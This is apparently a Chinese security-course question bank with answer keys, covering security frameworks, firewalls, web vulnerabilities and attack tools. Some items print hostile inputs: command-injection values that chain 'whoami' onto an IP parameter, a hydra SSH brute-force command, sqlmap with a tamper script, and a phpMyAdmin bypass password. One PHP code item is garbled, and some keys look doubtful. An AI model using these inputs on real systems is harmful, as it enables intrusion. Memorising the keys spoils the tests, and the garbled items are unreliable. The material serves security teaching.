C、 为达到特定目标而执行的详细步骤
D、 措施包括自定完成事情的时间,自定完成任务的时候需要详细阶段与步骤
您的答案: 标准答案: A
20、基准是设定一些标准安全,不能触碰、超越的底线,定义所需要的最低保护级别。()
A、 对
B、 错
您的答案: 标准答案: A
21、指南是为达到特定目标而执行的详细步骤,不便于搭建服务器、中间件和自定文档。()
A、 对
B、 错
您的答案: 标准答案: B
22、主体访问客体步骤正确的是():
A、 身份标识,身份验证,授权,访问资源,问责
B、 用户,授权,程序,系统。
C、 密码短语,密钥,个人身份证(PIN),令牌,访问资源
D、 身份标识,主体凭证,身份验证,授权,问责
您的答案: 标准答案: A
23、访问控制是一种安全手段,主体即一个虚体,客体是被访问信息或被访问实体,访问指主体和客体之间的信息流动。()
A、 对
B、 错
您的答案: 标准答案: B
24、主体和客体之间理解,主动去访问电脑、应用的是主体,被访问的文件、磁盘是客体。()
A、 对
B、 错
您的答案: 标准答案: A
25、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()
A、 对
B、 错
您的答案: 标准答案: A
26、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()
A、 对
B、 错
您的答案: 标准答案: A
27、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()
A、 对
B、 错
您的答案: 标准答案: A
28、TOGAF框架需求管理迭代步骤方法正确的是():
A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构
您的答案: 标准答案: A
29、Zachman企业框架方向和设计都是采用纵横坐标。()
A、 对
B、 错
您的答案: 标准答案: A
30、Zachman模型不是基于人来开发的一个模型框架。()
A、 对
B、 错
您的答案: 标准答案: B
31、SABSA模型内容不包括的层次是():
A、 审计、战略
B、 度量、实施
C、 渗透、防御
D、 概念
您的答案: 标准答案: C
32、SABSA模型纵横坐标定义错误的是():
A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层
B、 横坐标:什么,为什么,过程,谁,地点,时间
C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表
D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序
您的答案: 标准答案: C
33、SABSA模型不是基于安全架构开发的一个模型和方法论。()
A、 对
B、 错
您的答案: 标准答案: B
34、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()
A、 对
B、 错
您的答案: 标准答案: A
35、第一代防火墙技术是基于电路层流量
A、 对
B、 错
您的答案: 标准答案: B
36、数据通过防火墙传输是发生在哪层
A、 会话层
B、 传输层
C、 网络层
D、 链路层
您的答案: 标准答案: C
37、防火墙术语中Trust指的是
A、 源端口
B、 源IP
C、 NAT
D、 DMZ
您的答案: 标准答案: B
38、集成防火墙类似于UTM
A、 对
B、 错
您的答案: 标准答案: A
39、防火墙的简单包过滤工作相关说法正确的是
A、 防火墙会检查数据区是否有恶意数据
B、 防火墙会建立连接状态表用于保持连接
C、 前后报文无关联
D、 防火墙对应用层控制较强
您的答案: 标准答案: C
40、防火墙包过滤规则中,21端口用于FTP数据包的传输
A、 对
B、 错
您的答案: 标准答案: B
41、CPU指令类型包括进程和线程
A、 对
B、 错
您的答案: 标准答案: A
42、分层级设计的操作系统中,0层控制哪方面
A、 应用程序
B、 存储
C、 处理器
D、 进程
您的答案: 标准答案: C
43、系统安全架构中属于终端防护的是
A、 主机防火墙
B、 交换机管理
C、 补丁管理
D、 上网监控
您的答案: 标准答案: A
44、操作系统安全保护的核心是系统应用程序及数据库功能
A、 对
B、 错
您的答案: 标准答案: B
45、Linux系统中对文件的权限控制属于哪类信息安全模型
A、 非干扰模型
B、 Biba模型
C、 Clark-Wilson模型
D、 访问矩阵模型
您的答案: 标准答案: D
46、以下哪类模型采用了分层级的设计
A、 信息流模型
B、 中国墙模型
C、 Bell-LaPadula模型
D、 非干扰模型
您的答案: 标准答案: C
47、状态机模型描述了一种无论处于何种状态都是绝对安全的系统
A、 对
B、 错
您的答案: 标准答案: B
48、人在互联网中的角色呈现多样性这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
49、视频中以下哪项不是舆情分析需要的知识储备?
A、 传播学
B、 统计学
C、 心理学
D、 人体力学
您的答案: 标准答案: D
50、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: B
1、如何使用sqlmap自带的绕过脚本?
A、 sqlmap.py -u “http://xxx.com/index.php?id=1” --dbs
B、 sqlmap.py -u “http://xxx.com/index.php” --data “id=1” --dbs
C、 sqlmap.py -u “http://xxx.com/index.php?id=1” -v 3 --tamper “xxx.py” --dbs
D、 sqlmap.py -u “http://xxxx.com/index.php” --cookie “id=1” --level 2 --dbs
您的答案: 标准答案: C
2、下列哪项不是文件信息泄露的途径?
A、 网站目录备份
B、 默认的网站数据库文件
C、 网站提供的上传功能
D、 第三方源代码管理
您的答案: 标准答案: C
3、下列关于Windows权限的继承,说法不当的是?
A、 新建的子文件夹和文件会继承上一级目录的权限
B、 根目录下的文件夹或文件继承磁盘分区的权限
C、 下级目录可以拒绝继承上级权限
D、 默认子目录不继承上一级目录权限
您的答案: 标准答案: D
4、下列Backup Operators组权限中,说法错误的是?
A、 从网络访问此计算机
B、 调整进程的内存分配
C、 允许本地登录
D、 关闭系统
您的答案: 标准答案: B
5、下列哪个工具可以造成局域网网络瘫痪?
A、 namp
B、 sqlmap
C、 arpspoof
D、 zaproxy
您的答案: 标准答案: C
6、下列解决“Zip炸弹”的办法中有效的是?
A、 限制文件大小和类型
B、 限制文件内容
C、 限制文件名称
D、 限制文件路径
您的答案: 标准答案: A
7、下列关于JAVA序列化机制的说法错误的是?
A、 包含系统资源的直接句柄和相对地址空间信息的字段不被声明为transient,该对象在序列化状态下可能会被修改
B、 保护虚拟机外的字节流的另一方式是对序列化包产生的流进行加密
C、 字节流加密防止解码或读取被序列化的对象的私有状态
D、 对象流就是将对象的内容进行流化,不可以对流化后的对象进行读写操作
您的答案: 标准答案: D
8、下列关于浏览器刷新和转到的说法错误的是?
A、 刷新检查时会保留之前的一些变量的值
B、 刷新浏览器取网页的新内容来更新本机缓存
C、 转到是浏览器会使用已经存于本机中的缓存
D、 转到使用本机中的缓存文件,同时保留之前的变量
您的答案: 标准答案: D
9、FileReader.read方法返回值的取值范围是____。
A、 0-127
B、 1-128
C、 0-255
D、 0-65535
您的答案: 标准答案: D
10、下列选项在样式表中会被浏览器忽略的____。
A、 /
B、 *
C、 //
D、 /**/
您的答案: 标准答案: D
11、CSS属性可以是元素固有的属性但不可以是自定义的属性。
A、 正确
B、 错误
您的答案: 标准答案: B
12、下面关于web组件的描述不正确的是____。
A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架
B、 不同的web开发框架开发出的web应用功能也不同
C、 存储包括数据库存储、文件存储、内存存储
D、 目前最主流的web容器是Apache
您的答案: 标准答案: B
13、CSS属性可以是元素固有的属性但不可以是自定义的属性。
A、 正确
B、 错误
您的答案: 标准答案: B
14、下列代码 能够被
A、 IE6
B、 IE7
C、 IE8
D、 IE9
您的答案: 标准答案: A
15、下列选项在样式表中会被浏览器忽略的是?
A、 /
B、 *
C、 //
D、 /**/
您的答案: 标准答案: D
16、下列选项是firebug中控制台命令行输入开头符号的是?
A、 :
B、 ~
C、 //
D、 >
您的答案: 标准答案: D
17、FileReader.read方法返回值的取值范围是?
A、 0-127
B、 1-128
C、 0-255
D、 0-65535
您的答案: 标准答案: D
18、InputStream.read返回值为____,作为读取流结束标志。
A、 true
B、 false
C、 -1
D、 1
您的答案: 标准答案: C
19、下面关于web组件的描述不正确的是____。
A、 主流的web前端框架包括:jQuery/Bootstrap/HTML5框架
B、 不同的web开发框架开发出的web应用功能也不同
C、 存储包括数据库存储、文件存储、内存存储
D、 目前最主流的web容器是Apache
您的答案: 标准答案: B
20、下列在执行完exp后获取cmd的shell应该输入____命令。
A、 system
B、 cmd
C、 whoami
D、 shell
您的答案: 标准答案: D
21、下列中容易被xss窃取账号信息的是____。
A、 不轻易访问陌生链接
B、 使用无线网络应注意自己是否被劫持
C、 发现网站中存在xss告知网站客服
D、 直接打开并登录别人发的网址
您的答案: 标准答案: D
22、下列插件中,具有代理功能的是:
A、 Hackbar
B、 FoxyProxy
C、 ModifyHeaders
D、 ShowIP
您的答案: 标准答案: B
23、下列软件中,是源代码审计工具的是:
A、 PCHunter
B、 WebShellKill
C、 AZServerTool
D、 Seay审计工具
您的答案: 标准答案: D
24、php.ini 是___配置文件:
A、 全局
B、 当前文件夹
C、 指定文件夹
D、 指定文件
您的答案: 标准答案: A
25、在php配置文件,设置short_open_tag =On的意思是:
A、 启用全局变量
B、 关闭全局变量
C、 启用短标签
D、 关闭短标签
您的答案: 标准答案: C
26、开启php安全模式后,下列哪个代码无法正常执行:
A、
B、
C、
D、
您的答案: 标准答案: C
27、在php.ini中设置allow_url_include=off后,网站程序能够包含远程文件
A、 对
B、 错
您的答案: 标准答案: B
28、下列php函数属于危险函数的是:
A、 echo
B、 eval
C、 levenshtein
D、 php_check_syntax
您的答案: 标准答案: B
29、下列函数中,不属于包含函数的是:
A、 require
B、 include
C、 include_once
D、 levenshtein
您的答案: 标准答案: D
30、重命名一个文件或目录的函数是:
A、 rmdir
B、 unlink
C、 rename
D、 fopen
您的答案: 标准答案: C
31、下列函数中不属于命令执行函数的是:
A、 exec()
B、 proc_open()
C、 system()
D、 echo()
您的答案: 标准答案: D
32、php.ini中的安全模式是默认开启
A、 对
B、 错
您的答案: 标准答案: B
33、安装好XDebug后,需要配置什么文件才能够使用:
A、 php.ini
B、 .htaccess
C、 httpd.conf
D、 nsswitch.conf
您的答案: 标准答案: A
34、我们可以使用XDebug来跟踪,调试和分析PHP程序
A、 对
B、 错
您的答案: 标准答案: A
35、php程序中针对于安装问题的审计属于特定功能定向法:
A、 对
B、 错
您的答案: 标准答案: A
36、登录密码爆破属于哪一类漏洞:
A、 XSS
B、 sql注入
C、 撞库
D、 CSRF
您的答案: 标准答案: C
37、通过删除phpsessid,达到绕过验证码的目的,该攻击手法名称为:
A、 绕过sessid爆破
B、 修改sessid爆破
C、 sessid不更新造成爆破
D、 根据sessid生成验证码造成爆破
您的答案: 标准答案: A
38、通过使用不易被识别的验证码,且不根据sessid生成验证码内容能够有效防止爆破攻击
A、 对
B、 错
您的答案: 标准答案: A
39、下列漏洞中,哪些不属于注入漏洞:
A、 命令执行
B、 XSS
C、 敏感信息泄漏
D、 sql注入
您的答案: 标准答案: C
40、下列函数中,哪个不能用来执行命令注入漏洞:
A、 system()
B、 exec()
C、 echo()
D、 passthru()
您的答案: 标准答案: C
41、使用正则表达式对输入的参数进行过滤,能够达到修补和防御命令注入漏洞
A、 对
B、 错
您的答案: 标准答案: A
42、本机文件包含漏洞不能够包含哪些文件:
A、 日志文件
B、 本地网站文件
C、 远程木马文件
D、 session文件
您的答案: 标准答案: C
43、当allow_url_include和allow_url_fopen都设置为off时,能够直接包含共享文件
A、 对
B、 错
您的答案: 标准答案: A
44、下列注入漏洞不属于sql注入的是:
A、 数字型注入
B、 字符型注入
C、 cookie注入
D、 跨站脚本注入
您的答案: 标准答案: D
45、下列功能点不能够造成sql注入的有:
A、 使用模糊查询
B、 waf替换关键字
C、 使用id进行查询
D、 网站html标签过滤不完善
您的答案: 标准答案: D
46、使用完善的waf脚本且对sql语句中的参数进行处理,能够修补和杜绝sql注入漏洞
A、 对
B、 错
您的答案: 标准答案: A
47、截断注入在什么情况下比较适用:
A、 无法闭合单引号进行注入时
B、 数据库语句为双条件
C、 当无法闭合单引号进行注入时且为数据库语句为双条件
D、 当无法闭合单引号进行注入时不为数据库语句为双条件
您的答案: 标准答案: C
48、下列选项对二次注入说法正确的是:
A、 当用户输入的恶意数据首次传送给数据库时,将会进行安全的处理,但当应用程序调用时将会以一种危险的方式运行
B、 当用户输入的恶意数据传送给数据库时,应用程序调用时将会以一种危险的方式运行
C、 如果无法注释sql语句则无法进行二次注入攻击
D、 无法闭合单引号是,无法进行二次注入攻击
您的答案: 标准答案: A
49、为所有数据库访问使用参数查询并参数化集成到查询中的每个数据项,可以有效的防御二次注入漏洞
A、 对
B、 错
您的答案: 标准答案: A
50、任意文件读取属于什么漏洞:
A、 文件操作漏洞
B、 数据库操作漏洞
C、 XSS漏洞
D、 文件包含漏洞
您的答案: 标准答案: A
1、下列哪个操作不能通过越权漏洞来实现:
A、 修改管理员密码
B、 修改其他人帐号密码
C、 删除网站代码
D、 查看其它人信息
您的答案: 标准答案: C
2、越权漏洞分为平行越权和垂直越权:
A、 对
B、 错
您的答案: 标准答案: A
3、下列对跨站脚本攻击(XSS)的描述正确的是:
A、 XSS 攻击指的是恶意攻击在 WEB 页面里插入恶意代码, 当用户浏览该页面时嵌入其中 WEB 页面的代码会被执行
B、 XSS 攻击是 DOOS 攻击的一种变种
C、 XSS 攻击就是 CC 攻击
D、 XSS 攻击就是利用被控制的机器不断地向被攻击网站发送访问请求
您的答案: 标准答案: A
4、下列选项中,对非持久型xss攻击说法正确的是:
A、 非持久型XSS攻击是一次性的
B、 非持久型XSS攻击可以持续攻击,具有持续性
C、 非持久型XSS攻击是将攻击语句插入到服务器端
D、 非持久型XSS攻击可以对所有访问该网页的用户进行攻击
您的答案: 标准答案: A
5、根据近几年的统计web应用漏洞影响率最高的漏洞是
A、 XSS
B、 SQL注入
C、 信息泄露
您的答案: 标准答案: A
6、128位安全套接层技术是指哪种
A、 SSH
B、 SSL
C、 SH
您的答案: 标准答案: B
7、再互联网早期没有动态内容都是静态内容
A、 对
B、 错
您的答案: 标准答案: A
8、劫持账号是属于何种权限提升
A、 水平权限提升
B、 垂直权限提升
C、 扩展权限提升
您的答案: 标准答案: B
9、IIS或APCHE这种http底层服务器软件是属于哪种分类
A、 web应用
B、 web平台
C、 web客户端
您的答案: 标准答案: B
10、web应用攻击包括资源和认证,会话攻击等
A、 对
B、 错
您的答案: 标准答案: A
11、HTTP首部字段中的Host指的是以下哪种
A、 请求资源所在服务器
B、 发送指令的主机
C、 使用者的主机地址
您的答案: 标准答案: A
12、临时重定向在HTTP状态码中的数字代号是
A、 301
B、 302
C、 503
您的答案: 标准答案: B
13、以下属于HTTP方法的是
A、 POST
B、 ACL
C、 Cookie
您的答案: 标准答案: A
14、get方式只能支持ASCII字符
A、 对
B、 错
您的答案: 标准答案: A
15、关于CSRF说法正确的是
A、 删掉referer字段可以用来防止CSRF攻击
B、 CSRF攻击只能利用GET方式去达到攻击的目的
C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击
D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站
您的答案: 标准答案: D
16、xss和csrf的漏洞原理是一样的
A、 对
B、 错
您的答案: 标准答案: B
17、利用CSRF漏洞进行测试,相关说法错误的是
A、 CSRF是利用管理员的操作在无声无息中进行
B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作
C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库
D、 默认设置情况下,找到备份数据库的网站路径即可下载网址的.sql文件
您的答案: 标准答案: B
18、CSRF可以在无声无息中进行管理员的操作
A、 对
B、 错
您的答案: 标准答案: A
19、关于验证码说法错误的是
A、 为了防止恶意破解密码,刷票,论坛灌水,刷页
B、 可以防止黑客对特定注册用户特定程序进行暴力破解登陆
C、 验证码通常使用一些线条和一些不规则的字符组成
D、 通过手机短信发送的4位数验证码是非常安全的
您的答案: 标准答案: D
20、保证验证码的新鲜度可以有效的防止大多数暴力破解攻击
A、 对
B、 错
您的答案: 标准答案: A
21、绕过验证码的方法不包括
A、 统默认不显示验证码,而是在用户校验错误一定次数之后再出现,在cookie中写入一个标记,比如loginErr = 1,后续错误累加。 攻击者不带Cookie提交请求即可绕过验证码功能。
B、 验证码在web服务器上对应一个session值,攻击者在cookie中带固定的sessionID和固定的一个验证码字符串,即可轻松爆破。
C、 程序把验证码的内容发送到客户端cookie、或输出到response headers的其他字段,攻击者可以轻松逆向破解得到原值。
D、 如果实施ip策略强制输入验证码,这样可以防止验证码的安全问题,没办法攻破
您的答案: 标准答案: D
22、安全的验证码使用规则最合适的是验证码只能用一次
A、 对
B、 错
您的答案: 标准答案: A
23、关于验证码识别并且暴力破解密码说法错误的是
A、 4位数的图像验证码是可以被工具直接识别的,安全性形同虚设
B、 爆破成功以后会提示302跳转登陆
C、 不管验证码是图片还是数字,只要随机不够,图片干扰不够还是有机会可以进行验证码的机器识别
D、 验证码可以解决90%以上的Web安全问题
您的答案: 标准答案: D
24、解决验证码识别问题是攻击者为了更好的进行暴力破解攻击
A、 对
B、 错
您的答案: 标准答案: A
25、php中哪些函数可以执行系统命令
A、 file_put_contents
B、 system
C、 print_r
D、 var_dump
您的答案: 标准答案: B
26、系统命令执行是指应用程序对传入命令行的参数过滤不严导致恶意用户能控制最终执行的命令
A、 对
B、 错
您的答案: 标准答案: A
27、通过php哪项配置可以禁止webshell执行系统命令
A、 disable_setting
B、 disable_shell
C、 disable_functions
D、 disable_config
您的答案: 标准答案: C
28、``可以执行系统命令
A、 对
B、 错
您的答案: 标准答案: A
29、对于下面代码,能成功执行命令的选项是 t a r g e t = t r i m ( target = trim( target=trim(_REQUEST[ ‘ip’ ]); KaTeX parse error: Expected 'EOF', got '&' at position 25: …ions = array( '&̲amp;' => '',…’ => ‘’, ‘(’ => ‘’, ‘)’ => ‘’, ‘`’ => ‘’, ); $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); $cmd = shell_exec( 'ping -c 4 ’ . KaTeX parse error: Expected 'EOF', got '&' at position 8: target &̲#41;; print_r(cmd); } ?>
A、 ip=127.0.0.1|whoami
B、 ip=127.0.0.1&whoami
C、 ip=127.0.0.1||whoami
D、 ip=127.0.0.1&&whoami
您的答案: 标准答案: C
30、对于下面代码,能成功执行”whoami”的选项是
A、 ip=127.0.0.1|whoami
B、 ip=127.0.0.1&whoami
C、 ip=127.0.0.1||whoami
D、 ip=127.0.0.1&&whoami
您的答案: 标准答案: A
31、如果||的前面命令执行失败则执行 || 后面的命令
A、 对
B、 错
您的答案: 标准答案: A
32、关于MS15-034HTTP远程代码执行漏洞说法正确的是
A、 利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。
B、 该漏洞对服务器系统造成了不小的影响,主要影响了Centos,redhat等LINUX的主流服务器操作系统。
C、 MS15-034HTTP远程代码执行漏洞的CVE编号为CVE-2015-1647
D、 Http.sys 为了在Windows平台上优化niginx服务器性能而引入的一个内核模式驱动程序。它为niginx及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。
您的答案: 标准答案: A
33、MS15-034可以进行本地提权
A、 对
B、 错
您的答案: 标准答案: B
34、关于Jboss反序列化漏洞说法有误的是
A、 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程
B、 Jboss反序列化漏洞是在反序列化时并没有限制实例化对象的类型,导致可以任意构造应用中已经包含的对象利用反序列化操作进行实例化。
C、 Java 在进行反序列化操作的时候会使用 ObjectInputStream 类调用 readObject() 方法去读取传递过来的序列化对象字节流进行处理
D、 Boss反序列化漏洞文件是JMXInvokerServlet
您的答案: 标准答案: D
35、解决Jboss远程方法调用漏洞把invoker删除再把1099关闭即可
A、 对
B、 错
您的答案: 标准答案: A
36、关于st2说法错误的是
A、 存在st2漏洞的网站可以执行命令
B、 存在st2漏洞的网站大多数是最高权限
C、 s2-016参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行
D、 st2漏洞会导致php网站被攻陷
您的答案: 标准答案: D
37、st2漏洞是没有正确过滤用户的输入输出导致的问题
A、 对
B、 错
您的答案: 标准答案: A
38、关于心脏出血漏洞说法错误的是
A、 Heartbleed漏洞产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查
B、 Heartbleed漏洞可以获得https传输的用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据
C、 Heartbleed漏洞是近几年来影响广泛,覆盖面广,危害很高的漏洞之一
D、 利用Heartbleed漏洞用户每次读取都能获得相关用户名密码
您的答案: 标准答案: D
39、关于CVE-2015-4024说法有误的是
A、 是PHP multipart/form-data 导致的远程DOS漏洞
B、 因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS
C、 在该漏洞中multipart_buffer_headers函数解析header对应value时,value值是不存在的
D、 升级PHP版本可以很好的抵御该漏洞的攻击
您的答案: 标准答案: C
40、DDOS攻击也有可能是代码本身导致的问题
A、 对
B、 错
您的答案: 标准答案: A
41、关于逻辑/越权漏洞说法有误的是
A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞
B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。
C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因
D、 密码找回漏洞是权限管理不足导致的问题
您的答案: 标准答案: D
42、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键
A、 对
B、 错
您的答案: 标准答案: A
43、关于密码找回说法有误的是
A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解
B、 有些密码找回凭证可从客户端直接获取
C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞
D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置
您的答案: 标准答案: C
44、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的
A、 对
B、 错
您的答案: 标准答案: A
45、关于越权漏洞说法有误的是
A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定
B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试
C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户
D、 4. 越权漏洞的本身对网站不会照成攻击伤害
您的答案: 标准答案: D
46、下列关于暴力破解说法错误的是
A、 1. 暴力猜解就是将密码进行逐个推算,直到找到正真的密码为止
B、 2. 暴力破解分为c/s架构的破解和b/s架构的破解
C、 3. 暴力破解的成功率取决于字典的准确性和覆盖性
D、 4. 只要有数据传输的地方就可以进行暴力破解
您的答案: 标准答案: D
47、 暴力破解即是一个无限穷举的过程
A、 对
B、 错
您的答案: 标准答案: A
48、关于hydra使用说法有误的是
A、 hydra在Linux和windows平台上都可以使用
B、 爆破ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns x.x.x.x ssh
C、 hydra可以支持大多数服务和协议
D、 hydra可以支持一个C段服务器的22端口爆破
您的答案: 标准答案: D
49、关于eWebEditor编辑器说法有误的是
A、 1. eWebEditor编辑器一般都是通过默认口令进入后台来拿shell
B、 2. 加入下载到ewebeditor.mdb可以通过某些工具来读取管理员密码
C、 3. eWebEditor后台修改自定义上传后缀即可拿shell
D、 4. 可以配合iis6等服务器的解析漏洞来获得网站的webshell
您的答案: 标准答案: D
50、关于FCKeditor 说法有误的是
A、 1. 默认查看编辑器版本通过FCKeditor/_whatsnew.html
B、 2. 默认编辑页FCKeditor/_samples/default.html 等等
C、 3. 在FCKeditor2.2到2.4.2的php版本中存在任意文件上传
D、 4. FCKeditor只有任意文件上传漏洞
您的答案: 标准答案: D
1、phpmyadmin某些低版本中存在的万能密码是
A、 localhost’@’@’
B、 localhost’@’@"
C、 localhost’@"@"
您的答案: 标准答案: B
2、通过扫描器很难扫描到逻辑漏洞,这种说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
3、IIS 组件中不包括以下哪项服务?
A、 WEB 服务
B、 FTP 服务
C、 APACHE 服务
D、 SMTP 服务
您的答案: 标准答案: C
4、在网站属性的目录安全性中,不可以定义的是以下哪一项?
A、 身份验证和访问控制
B、 目录权限设置
C、 IP地址和域名限制
D、 安全通信
您的答案: 标准答案: B
5、IIS 安装后,默认可以使用ASP、ASP.NET等功能,是否正确?
A、 对
B、 错
您的答案: 标准答案: B
6、FTP 服务默认端口是?
A、 21
B、 80
C、 8080
D、 22
您的答案: 标准答案: A
7、以下哪个命令可往FTP服务器传输文件?
A、 GET
B、 INPUT
C、 PUT
D、 OPEN
您的答案: 标准答案: C
8、FTP 主要是用来实现客户端与服务器的文件传输,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
9、使用以下哪个选项可以查看本机路由表?
A、 route add
B、 route print
C、 route delete
D、 route change
您的答案: 标准答案: B
10、以下不属于 “ 外部网络协议” 主要功能的是?
A、 用于外部邻站的获取
B、 用于邻站的可达性测试
C、 用于选路由信息更新
D、 用于本地系统内部使用的选路协议
您的答案: 标准答案: D
11、Windows Server 2003的 “路由和远程访问” 服务是一个全功能的软件路由器,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
12、按照协议分类,以下不属于VPN类型的是?
A、 PPTP
B、 L2TP
C、 IPSec
D、 TCP
您的答案: 标准答案: D
13、Windows Server 2003中,远程访问策略,默认有几个?
A、 1
B、 2
C、 3
D、 4
您的答案: 标准答案: B
14、某公司员工出差到外地,他想访问企业内网的服务器资源,这时候我们可以通过VPN技术来实现,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
15、以下哪个命令可以查看Linux系统是否安装了BIND程序包?
A、 rpm -q bind
B、 rpm -i bind
C、 rpm -v bind
D、 rpm -h bind
您的答案: 标准答案: A
16、以下哪个选项可以重启DNS服务?
A、 service named stop
B、 service named start
C、 /etc/rc.d/init.d/named stop
D、 service named restart
您的答案: 标准答案: D
17、在主配置文件中添加所规划的正向区域和反向区域,以“zone”为关键字设定区域,指向区域文件所在位置和文件名,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
18、在 wireshark筛选器中,可以捕获出所有 ip 为 192.168.1.1 的是?
A、 ip.src == 192.168.1.1
B、 ip.dst == 192.168.1.1
C、 ip.addr == 192.168.1.1
D、 !(ip.src == 192.168.1.1)
您的答案: 标准答案: C
19、对于筛选器中输入 ip.addr == 192.168.1.1 and tcp.port == 8080描述正确的是?
A、 筛选出目的IP地址为 192.168.1.1 并且端口为 8080 的数据包
B、 筛选出目的IP地址为 192.168.1.1 或者端口为 8080 的数据包
C、 筛选出所有IP地址为 192.168.1.1 并且端口为 8080 的数据包
D、 筛选出所有IP地址为 192.168.1.1 或者端口为 8080 的数据包
您的答案: 标准答案: C
20、在 wireshark筛选器中,输入 http 可以捕获 http 协议的数据包,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
21、wireshark 中,Statistics菜单项下的 Protocol Hierarchy 选项主要功能是什么?
A、 显示捕捉数据摘要
B、 显示协议统计分层信息
C、 显示会话列表
D、 显示端点列表
您的答案: 标准答案: B
22、wireshark中最活跃的通讯端点,并不一定包括流量最大的会话,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
23、在IO Graphs 中,可以使用哪项命令排查有丢失的数据包?
A、 tcp.analysis.lost_segment
B、 tcp.analysis.window_update
C、 tcp.analysis.ack_rtt
D、 tcp.analysis.duplicate_ack
您的答案: 标准答案: A
24、我们可以使用 wireshark 中的 IO Graph来对网络整体流量信息进行显示分析,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
25、以下哪个文件夹存放的是 wireshark 负责解析网络协议文件?
A、 Core
B、 Capture
C、 Epan
D、 Wiretap
您的答案: 标准答案: C
26、FTP协议使用443端口而不是标准21端口时,我们可以强制将解析错误的包按照指定协议解析,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
27、设置后,达到无法通过客户端 JavaScript 直接访问 Cookie 的选项是
A、 Domain
B、 Expires
C、 Secure
D、 HttpOnly
您的答案: 标准答案: D
28、下列选项中,状态码解释错误的选项是
A、 200: 表示已成功提交请求,且相应主体中包含请求结果
B、 400: 表示客户端提交了一个无效的 HTTP 请求
C、 414: 服务器无法处理客户端发送的不带Content-Length的请求信息
D、 500:服务器内部错误,无法完成请求
您的答案: 标准答案: C
29、下列选项中,表示将浏览器暂时重定向到另外一个在 Location 消息头中指定的 URL 的状态码是
A、 100
B、 201
C、 302
D、 403
您的答案: 标准答案: C
30、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
31、下列 URL 编码解释错误的是:
A、 %3d 代表 =
B、 %25 代表 %
C、 %0a 代表新行
D、 %00 代表空格
您的答案: 标准答案: D
32、下面 HTML 编码解释错误的是:
A、 " 代表 "
B、 &apos 代表 ’
C、 < 代表 <
D、 > 代表 <
您的答案: 标准答案: D
33、如果没有启用 WebDAV 扩展,OPTIONS 命令是无法查看 IIS 支持的方法集合的。即便是复选上了“写入”,仍然无法写入 txt 文件。该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
34、动态语言,服务器和客户端代码不一致;静态语言,服务端和客户端代码一致。该说法是否正确()
A、 对
B、 错
您的答案: 标准答案: A
35、下列一键 PHP 环境的工具中,不可以安装在 Linux 中的是()
A、 PHPStudy
B、 PHPNow
C、 WampServer
D、 XAMPP
您的答案: 标准答案: C
36、下列 ASP 接受参数的方式错误的是()
A、 request
B、 request.get
C、 request.cookie
D、 request.form
您的答案: 标准答案: B
37、下列链接中不存在注入点的是()
